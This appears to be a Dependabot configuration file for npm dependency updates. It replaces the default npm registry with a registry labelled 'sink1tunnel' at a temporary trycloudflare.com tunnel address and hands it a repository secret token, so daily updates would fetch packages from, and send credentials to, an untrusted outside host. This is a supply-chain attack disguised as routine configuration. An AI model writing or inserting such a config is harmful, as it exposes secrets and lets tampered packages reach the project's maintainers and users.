# p7r p5e_5e_vs 1790620517
version: 2
registries:
  sink1tunnel:
    type: npm-registry
    url: https://rand-terms-bytes-subsidiaries.trycloudflare.com/redirc/vs
    token: ${{secrets.SINK1_TOKEN}}
    replaces-base: true
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule: {interval: "daily"}
    registries: "*"
